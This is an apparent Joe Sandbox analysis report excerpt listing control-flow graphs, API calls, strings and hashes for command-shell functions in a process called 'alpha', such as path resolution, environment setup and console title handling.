                                                                                      control_flow_graph 732 7ff793753c24-7ff793753c61 733 7ff793753c67-7ff793753c99 call 7ff79374af14 call 7ff79374ca40 732->733 734 7ff79375ec5a-7ff79375ec5f 732->734 743 7ff79375ec97-7ff79375eca1 call 7ff79375855c 733->743 744 7ff793753c9f-7ff793753cb2 call 7ff79374b900 733->744 734->733 735 7ff79375ec65-7ff79375ec6a 734->735 737 7ff79375412e-7ff79375415b call 7ff793758f80 735->737 744->743 749 7ff793753cb8-7ff793753cbc 744->749 750 7ff793753cbf-7ff793753cc7 749->750 750->750 751 7ff793753cc9-7ff793753ccd 750->751 752 7ff793753cd2-7ff793753cd8 751->752 753 7ff793753cda-7ff793753cdf 752->753 754 7ff793753ce5-7ff793753d62 GetCurrentDirectoryW towupper iswalpha 752->754 753->754 755 7ff793753faa-7ff793753fb3 753->755 756 7ff793753fb8 754->756 757 7ff793753d68-7ff793753d6c 754->757 755->752 759 7ff793753fc6-7ff793753fec GetLastError call 7ff79375855c call 7ff79375a5d6 756->759 757->756 758 7ff793753d72-7ff793753dcd towupper GetFullPathNameW 757->758 758->759 760 7ff793753dd3-7ff793753ddd 758->760 763 7ff793753ff1-7ff793754007 call 7ff79375855c _local_unwind 759->763 762 7ff793753de3-7ff793753dfb 760->762 760->763 765 7ff7937540fe-7ff793754119 call 7ff79375855c _local_unwind 762->765 766 7ff793753e01-7ff793753e11 762->766 772 7ff79375400c-7ff793754022 GetLastError 763->772 778 7ff79375411a-7ff79375412c call 7ff79374ff70 call 7ff79375855c 765->778 766->765 770 7ff793753e17-7ff793753e28 766->770 774 7ff793753e2c-7ff793753e34 770->774 776 7ff793754028-7ff79375402b 772->776 777 7ff793753e95-7ff793753e9c 772->777 774->774 775 7ff793753e36-7ff793753e3f 774->775 779 7ff793753e42-7ff793753e55 775->779 776->777 780 7ff793754031-7ff793754047 call 7ff79375855c _local_unwind 776->780 781 7ff793753e9e-7ff793753ec2 call 7ff793752978 777->781 782 7ff793753ecf-7ff793753ed3 777->782 778->737 784 7ff793753e57-7ff793753e60 779->784 785 7ff793753e66-7ff793753e8f GetFileAttributesW 779->785 799 7ff79375404c-7ff793754062 call 7ff79375855c _local_unwind 780->799 793 7ff793753ec7-7ff793753ec9 781->793 788 7ff793753f08-7ff793753f0b 782->788 789 7ff793753ed5-7ff793753ef7 GetFileAttributesW 782->789 784->785 791 7ff793753f9d-7ff793753fa5 784->791 785->772 785->777 797 7ff793753f0d-7ff793753f11 788->797 798 7ff793753f1e-7ff793753f40 SetCurrentDirectoryW 788->798 794 7ff793753efd-7ff793753f02 789->794 795 7ff793754067-7ff793754098 GetLastError call 7ff79375855c _local_unwind 789->795 791->779 793->782 793->799 794->788 801 7ff79375409d-7ff7937540b3 call 7ff79375855c _local_unwind 794->801 795->801 803 7ff793753f13-7ff793753f1c 797->803 804 7ff793753f46-7ff793753f69 call 7ff79375498c 797->804 798->804 805 7ff7937540b8-7ff7937540de GetLastError call 7ff79375855c _local_unwind 798->805 799->795 801->805 803->798 803->804 815 7ff7937540e3-7ff7937540f9 call 7ff79375855c _local_unwind 804->815 816 7ff793753f6f-7ff793753f98 call 7ff79375417c 804->816 805->815 815->765 816->778
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                                                                      • String ID: :
                                                                                      • API String ID: 1809961153-336475711
                                                                                      • Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction ID: a379a60f1049dde1cd64dc169d5e85af75d6a4255325b09d43e1e1edf2e1aead
                                                                                      • Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
                                                                                      • Instruction Fuzzy Hash: 17D1402270DB8592EAB4EF25E4842BAF7A5FB88740F844136D94E537A4DF3CE545C720
                                                                                      Function 00007FF793752394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 914 7ff793752394-7ff793752416 memset call 7ff79374ca40 917 7ff79375241c-7ff793752453 GetModuleFileNameW call 7ff79375081c 914->917 918 7ff79375e0d2-7ff79375e0da call 7ff793754c1c 914->918 923 7ff79375e0db-7ff79375e0ee call 7ff79375498c 917->923 924 7ff793752459-7ff793752468 call 7ff79375081c 917->924 918->923 930 7ff79375e0f4-7ff79375e107 call 7ff79375498c 923->930 929 7ff79375246e-7ff79375247d call 7ff79375081c 924->929 924->930 935 7ff793752483-7ff793752492 call 7ff79375081c 929->935 936 7ff793752516-7ff793752529 call 7ff79375498c 929->936 937 7ff79375e10d-7ff79375e123 930->937 935->937 947 7ff793752498-7ff7937524a7 call 7ff79375081c 935->947 936->935 940 7ff79375e125-7ff79375e139 wcschr 937->940 941 7ff79375e13f-7ff79375e17a _wcsupr 937->941 940->941 944 7ff79375e27c 940->944 945 7ff79375e17c-7ff79375e17f 941->945 946 7ff79375e181-7ff79375e199 wcsrchr 941->946 949 7ff79375e283-7ff79375e29b call 7ff79375498c 944->949 948 7ff79375e19c 945->948 946->948 956 7ff7937524ad-7ff7937524c5 call 7ff793753c24 947->956 957 7ff79375e2a1-7ff79375e2c3 _wcsicmp 947->957 951 7ff79375e1a0-7ff79375e1a7 948->951 949->957 951->951 954 7ff79375e1a9-7ff79375e1bb 951->954 958 7ff79375e264-7ff79375e277 call 7ff793751300 954->958 959 7ff79375e1c1-7ff79375e1e6 954->959 964 7ff7937524ca-7ff7937524db 956->964 958->944 962 7ff79375e1e8-7ff79375e1f1 959->962 963 7ff79375e21a 959->963 966 7ff79375e1f3-7ff79375e1f6 962->966 967 7ff79375e201-7ff79375e210 962->967 965 7ff79375e21d-7ff79375e21f 963->965 968 7ff7937524dd-7ff7937524e4 ??_V@YAXPEAX@Z 964->968 969 7ff7937524e9-7ff793752514 call 7ff793758f80 964->969 965->949 970 7ff79375e221-7ff79375e228 965->970 966->967 972 7ff79375e1f8-7ff79375e1ff 966->972 967->963 973 7ff79375e212-7ff79375e218 967->973 968->969 974 7ff79375e22a-7ff79375e231 970->974 975 7ff79375e254-7ff79375e262 970->975 972->966 972->967 973->965 977 7ff79375e234-7ff79375e237 974->977 975->944 977->975 978 7ff79375e239-7ff79375e242 977->978 978->975 979 7ff79375e244-7ff79375e252 978->979 979->975 979->977
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                                                                      • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                      • API String ID: 2622545777-4197029667
                                                                                      • Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction ID: 272626189376325584adc33a3d91f497d77b2207a10d3037007bcf846100987b
                                                                                      • Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
                                                                                      • Instruction Fuzzy Hash: 38915D61B09A8685EEB8AB30D8905F9A3A8FF4CB85FC44136C90E67795DF3CE504C360
                                                                                      Function 00007FF793750580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                      • String ID: CMD.EXE
                                                                                      • API String ID: 1606018815-3025314500
                                                                                      • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction ID: 9249309a18d82c0b90a6bb40c08126453e5d43e8fc4e50ee32c00e719d7b95d6
                                                                                      • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                      • Instruction Fuzzy Hash: CF41D331A096428BF7A86B34E8D51B8B7A8FB8E752FC84179C50F533A0DF3CA5058661
                                                                                      Function 00007FF79374C620 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 312COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 992 7ff79374c620-7ff79374c66f GetConsoleTitleW 993 7ff79374c675-7ff79374c687 call 7ff79374af14 992->993 994 7ff79375c5f2 992->994 999 7ff79374c68e-7ff79374c69d call 7ff79374ca40 993->999 1000 7ff79374c689 993->1000 996 7ff79375c5fc-7ff79375c60c GetLastError 994->996 998 7ff79375c5e3 call 7ff793743278 996->998 1004 7ff79375c5e8-7ff79375c5ed call 7ff79375855c 998->1004 999->1004 1005 7ff79374c6a3-7ff79374c6ac 999->1005 1000->999 1004->994 1007 7ff79374c954-7ff79374c95e call 7ff79375291c 1005->1007 1008 7ff79374c6b2-7ff79374c6c5 call 7ff79374b9c0 1005->1008 1015 7ff79375c5de-7ff79375c5e0 1007->1015 1016 7ff79374c964-7ff79374c96b call 7ff7937489c0 1007->1016 1013 7ff79374c6cb-7ff79374c6ce 1008->1013 1014 7ff79374c9b5-7ff79374c9b8 call 7ff793755c6c 1008->1014 1013->1004 1018 7ff79374c6d4-7ff79374c6e9 1013->1018 1023 7ff79374c9bd-7ff79374c9c9 call 7ff79375855c 1014->1023 1015->998 1020 7ff79374c970-7ff79374c972 1016->1020 1021 7ff79375c616-7ff79375c620 call 7ff79375855c 1018->1021 1022 7ff79374c6ef-7ff79374c6fa 1018->1022 1020->996 1024 7ff79374c978-7ff79374c99a towupper 1020->1024 1025 7ff79375c627 1021->1025 1022->1025 1026 7ff79374c700-7ff79374c713 1022->1026 1039 7ff79374c9d0-7ff79374c9d7 1023->1039 1029 7ff79374c9a0-7ff79374c9a9 1024->1029 1031 7ff79375c631 1025->1031 1030 7ff79374c719-7ff79374c72c 1026->1030 1026->1031 1029->1029 1034 7ff79374c9ab-7ff79374c9af 1029->1034 1035 7ff79375c63b 1030->1035 1036 7ff79374c732-7ff79374c747 call 7ff79374d3f0 1030->1036 1031->1035 1034->1014 1037 7ff79375c60e-7ff79375c611 call 7ff79376ec14 1034->1037 1044 7ff79375c645 1035->1044 1045 7ff79374c8ac-7ff79374c8af 1036->1045 1046 7ff79374c74d-7ff79374c750 1036->1046 1037->1021 1042 7ff79374c9dd-7ff79375c6da SetConsoleTitleW 1039->1042 1043 7ff79374c872-7ff79374c8aa call 7ff79375855c call 7ff793758f80 1039->1043 1042->1043 1050 7ff79375c64e-7ff79375c651 1044->1050 1045->1046 1049 7ff79374c8b5-7ff79374c8d3 wcsncmp 1045->1049 1051 7ff79374c76a-7ff79374c76d 1046->1051 1052 7ff79374c752-7ff79374c764 call 7ff79374bd38 1046->1052 1049->1051 1054 7ff79374c8d9 1049->1054 1055 7ff79374c80d-7ff79374c811 1050->1055 1056 7ff79375c657-7ff79375c65b 1050->1056 1059 7ff79374c773-7ff79374c77a 1051->1059 1060 7ff79374c840-7ff79374c84b call 7ff79374cb40 1051->1060 1052->1004 1052->1051 1054->1046 1063 7ff79374c817-7ff79374c81b 1055->1063 1064 7ff79374c9e2-7ff79374c9e7 1055->1064 1056->1055 1061 7ff79374c780-7ff79374c784 1059->1061 1075 7ff79374c84d-7ff79374c855 call 7ff79374cad4 1060->1075 1076 7ff79374c856-7ff79374c86c 1060->1076 1067 7ff79374c83d 1061->1067 1068 7ff79374c78a-7ff79374c7a4 wcschr 1061->1068 1070 7ff79374ca1b-7ff79374ca1f 1063->1070 1071 7ff79374c821 1063->1071 1064->1063 1072 7ff79374c9ed-7ff79374c9f7 call 7ff79375291c 1064->1072 1067->1060 1073 7ff79374c8de-7ff79374c8f7 1068->1073 1074 7ff79374c7aa-7ff79374c7ad 1068->1074 1070->1071 1077 7ff79374ca25-7ff79375c6b3 call 7ff793743278 1070->1077 1078 7ff79374c824-7ff79374c82d 1071->1078 1086 7ff79374c9fd-7ff79374ca00 1072->1086 1087 7ff79375c684-7ff79375c698 call 7ff793743278 1072->1087 1081 7ff79374c900-7ff79374c908 1073->1081 1082 7ff79374c7b0-7ff79374c7b8 1074->1082 1075->1076 1076->1039 1076->1043 1077->1004 1078->1078 1085 7ff79374c82f-7ff79374c837 1078->1085 1081->1081 1088 7ff79374c90a-7ff79374c915 1081->1088 1082->1082 1089 7ff79374c7ba-7ff79374c7c7 1082->1089 1085->1061 1085->1067 1086->1063 1093 7ff79374ca06-7ff79374ca10 call 7ff7937489c0 1086->1093 1087->1004 1094 7ff79374c917 1088->1094 1095 7ff79374c93a-7ff79374c944 1088->1095 1089->1050 1096 7ff79374c7cd-7ff79374c7db 1089->1096 1093->1063 1111 7ff79374ca16-7ff79375c67f GetLastError call 7ff793743278 1093->1111 1100 7ff79374c920-7ff79374c928 1094->1100 1103 7ff79374ca2a-7ff79374ca2f call 7ff793759158 1095->1103 1104 7ff79374c94a 1095->1104 1101 7ff79374c7e0-7ff79374c7e7 1096->1101 1106 7ff79374c92a-7ff79374c92f 1100->1106 1107 7ff79374c932-7ff79374c938 1100->1107 1108 7ff79374c7e9-7ff79374c7f1 1101->1108 1109 7ff79374c800-7ff79374c803 1101->1109 1103->1015 1104->1007 1106->1107 1107->1095 1107->1100 1108->1109 1112 7ff79374c7f3-7ff79374c7fe 1108->1112 1109->1044 1113 7ff79374c809 1109->1113 1111->1004 1112->1101 1112->1109 1113->1055
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleTitlewcschr
                                                                                      • String ID: /$:
                                                                                      • API String ID: 2364928044-4222935259
                                                                                      • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction ID: 7a50722306868e47fb996f3c8b1dd0867a478090d794f9a3903296cce8a45828
                                                                                      • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                                                                      • Instruction Fuzzy Hash: 4AC19065A08643A2FAB4BB35D4C8379E2AAEF48B90FC44135D91E672D5DF3CE840D720
                                                                                      Function 00007FF793758D80 Relevance: 9.1, APIs: 6, Instructions: 95sleepCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1171 7ff793758d80-7ff793758da2 1172 7ff793758da4-7ff793758daf 1171->1172 1173 7ff793758dcc 1172->1173 1174 7ff793758db1-7ff793758db4 1172->1174 1177 7ff793758dd1-7ff793758dd9 1173->1177 1175 7ff793758db6-7ff793758dbd 1174->1175 1176 7ff793758dbf-7ff793758dca Sleep 1174->1176 1175->1177 1176->1172 1178 7ff793758ddb-7ff793758de5 _amsg_exit 1177->1178 1179 7ff793758de7-7ff793758def 1177->1179 1180 7ff793758e4c-7ff793758e54 1178->1180 1181 7ff793758e46 1179->1181 1182 7ff793758df1-7ff793758e0a 1179->1182 1183 7ff793758e73-7ff793758e75 1180->1183 1184 7ff793758e56-7ff793758e69 _initterm 1180->1184 1181->1180 1185 7ff793758e0e-7ff793758e11 1182->1185 1186 7ff793758e77-7ff793758e79 1183->1186 1187 7ff793758e80-7ff793758e88 1183->1187 1184->1183 1188 7ff793758e38-7ff793758e3a 1185->1188 1189 7ff793758e13-7ff793758e15 1185->1189 1186->1187 1191 7ff793758e8a-7ff793758e98 call 7ff7937594f0 1187->1191 1192 7ff793758eb4-7ff793758ec8 call 7ff7937537d8 1187->1192 1188->1180 1190 7ff793758e3c-7ff793758e41 1188->1190 1189->1190 1193 7ff793758e17-7ff793758e1b 1189->1193 1195 7ff793758f28-7ff793758f3d 1190->1195 1191->1192 1204 7ff793758e9a-7ff793758eaa 1191->1204 1199 7ff793758ecd-7ff793758eda 1192->1199 1197 7ff793758e2d-7ff793758e36 1193->1197 1198 7ff793758e1d-7ff793758e29 1193->1198 1197->1185 1198->1197 1202 7ff793758edc-7ff793758ede exit 1199->1202 1203 7ff793758ee4-7ff793758eeb 1199->1203 1202->1203 1205 7ff793758eed-7ff793758ef3 _cexit 1203->1205 1206 7ff793758ef9 1203->1206 1204->1192 1205->1206 1206->1195
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                      • String ID:
                                                                                      • API String ID: 4291973834-0
                                                                                      • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction ID: a6e33362265b251b22fd1a744eba515df69cefe95028110cbd91f614d4653b99
                                                                                      • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                      • Instruction Fuzzy Hash: C941D921A1864392F6F4BB30E8C0275A2A9AF4C746F940436D91EB77A0DF7DED408761
                                                                                      Function 00007FF7937489C0 Relevance: 9.1, APIs: 6, Instructions: 85COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1207 7ff7937489c0-7ff793748a3d memset call 7ff79374ca40 1210 7ff793748ace-7ff793748adf 1207->1210 1211 7ff793748a43-7ff793748a71 GetDriveTypeW 1207->1211 1214 7ff793748aed 1210->1214 1215 7ff793748ae1-7ff793748ae8 ??_V@YAXPEAX@Z 1210->1215 1212 7ff793748a77-7ff793748a7a 1211->1212 1213 7ff79375b411-7ff79375b422 1211->1213 1212->1210 1216 7ff793748a7c-7ff793748a7f 1212->1216 1218 7ff79375b424-7ff79375b42b ??_V@YAXPEAX@Z 1213->1218 1219 7ff79375b430-7ff79375b435 1213->1219 1217 7ff793748aef-7ff793748b16 call 7ff793758f80 1214->1217 1215->1214 1216->1210 1220 7ff793748a81-7ff793748ac8 GetVolumeInformationW 1216->1220 1218->1219 1219->1217 1220->1210 1222 7ff79375b3fc-7ff79375b40b GetLastError 1220->1222 1222->1210 1222->1213
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DriveErrorInformationLastTypeVolume
                                                                                      • String ID:
                                                                                      • API String ID: 850181435-0
                                                                                      • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                      • Instruction ID: 520bc9c30a68df39165a2460b21cb826533a49a27cca6ea12673be0cf855ca64
                                                                                      • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                                                                      • Instruction Fuzzy Hash: 63417F32608BC5C9E7B09F30D8842E9B7A9FB8DB85F944525DA4E5BB48CF38D645C710
                                                                                      Function 00007FF793754A14 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1224 7ff793754a14-7ff793754a3e GetEnvironmentStringsW 1225 7ff793754aae-7ff793754ac5 1224->1225 1226 7ff793754a40-7ff793754a46 1224->1226 1227 7ff793754a48-7ff793754a52 1226->1227 1228 7ff793754a59-7ff793754a8f GetProcessHeap HeapAlloc 1226->1228 1227->1227 1229 7ff793754a54-7ff793754a57 1227->1229 1230 7ff793754a9f-7ff793754aa9 FreeEnvironmentStringsW 1228->1230 1231 7ff793754a91-7ff793754a9a memmove 1228->1231 1229->1227 1229->1228 1230->1225 1231->1230
                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A28
                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A66
                                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A7D
                                                                                      • memmove.MSVCRT(?,?,00000000,00007FF7937549F1), ref: 00007FF793754A9A
                                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7937549F1), ref: 00007FF793754AA2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1787074256.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                      • String ID:
                                                                                      • API String ID: 1623332820-0
                                                                                      • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                      • Instruction ID: 95d4df94d86eb06f24399620539ece9ad3a42f0006c058c1ffe19f7d162591e8
                                                                                      • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                      • Instruction Fuzzy Hash: 6511A722A1874182EEA4AF65B484079FBA4FB8DF81F899039DE4F13744DF3DE4418760
                                                                                      Function 00007FF793755CB4 Relevance: 7.5, APIs: 5, Instructions: 36synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.1786734076.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000005.00000002.1786708961.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786876081.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.1786917710.00007FF793794000.00000004.00000001.01000000.00000004.sdmpDownload File
